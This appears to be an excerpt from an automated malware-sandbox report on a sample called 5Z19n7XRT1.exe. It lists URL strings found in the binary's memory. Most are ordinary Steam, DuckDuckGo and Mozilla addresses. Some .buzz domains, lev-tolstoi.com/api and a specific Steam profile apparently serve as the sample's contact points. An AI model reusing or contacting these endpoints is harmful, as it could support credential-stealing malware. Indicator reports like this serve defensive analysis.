Source: 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
Source: 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2390650962.000000000091F000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221183170.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221183170.000000000094D000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221455502.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270340473.0000000003056000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/&
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221183170.000000000094D000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221455502.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/.co.jp
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2390650962.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/KP
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2390650962.000000000092D000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000002.2391091654.0000000003038000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2245493207.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221183170.000000000094D000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221455502.000000000095A000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221183170.000000000091F000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221332902.0000000000921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221183170.000000000094D000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221455502.000000000095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api1Wu
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2167365798.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rebuildeso.buzz/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2167365798.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rebuildeso.buzz/ZTL
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2167365798.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2167343314.0000000000934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scentniej.buzz/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2167365798.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scentniej.buzz/IP
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2167365798.000000000091F000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2167365798.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2167452734.0000000000921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scentniej.buzz/api
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221183170.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199960919.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://screwamusresz.buzz/api3
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2245459003.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221183170.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199960919.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000002.2390650962.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2200122003.000000000092D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2245459003.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221183170.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199960919.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000002.2390650962.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900JW
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/privacy_agreement/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/stats/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/steam_refunds/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2293981905.0000000003501000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2293981905.0000000003501000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
